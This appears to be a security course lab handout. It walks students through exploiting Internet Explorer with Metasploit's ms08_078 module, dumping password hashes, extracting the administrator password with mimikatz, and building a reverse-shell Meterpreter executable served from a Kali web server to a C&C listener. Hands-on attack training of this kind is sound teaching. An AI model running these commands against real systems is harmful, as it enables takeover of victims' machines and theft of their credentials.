service postgresql start
msfdb init
msfconsole
search ms08-078
info exploit/windows/browser/ms08_078_xml_corruption
As shown below, this exploit doesn't require
any parameters--the default values are ok.
Execute these commands to run the exploit.
use exploit/windows/browser/ms08_078_xml_corruption
exploit
As shown below, the exploit
starts a malicious Web server and
displays a
Web address.
On the Windows target, open Internet Explorer and go to that Web address.
A Meterpreter session opens, as shown below.
Capture a whole-desktop image and save it as "Proj 4a".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
sessions -i 1
screenshot
hashdump
getuid
getsystem
load mimikatz
kerberos
The administrator password
appears,
as shown below.
Capture a whole-desktop image and save it as "Proj 4b".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT In Kali, execute these commands to exit metasploit.
exit
exit
Adjust the IP address to match the IP address of your Kali machine (the C&C server).
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe > fun.exe
cp fun.exe /var/www/html
service apache2 start
In Kali, execute these commands
to start a C&C listener.
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.1.188
exploit
On your Windows machine,
in Firefox, go to this URL,
replacing the IP address with the IP
address of your Kali machine:
http://172.16.1.188/fun.exeDownload fun.exe and run it.
On your Kali machine, a meterpeter session opens, as shown below.
Capture a whole-desktop image and save it as "Proj 4c".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
Send a Cc to yourself.
Last Modified: 8-17-17 12:12 pm